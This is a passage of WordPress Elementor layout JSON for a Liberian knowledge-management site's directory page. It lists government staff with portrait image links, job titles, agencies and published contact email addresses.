\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\"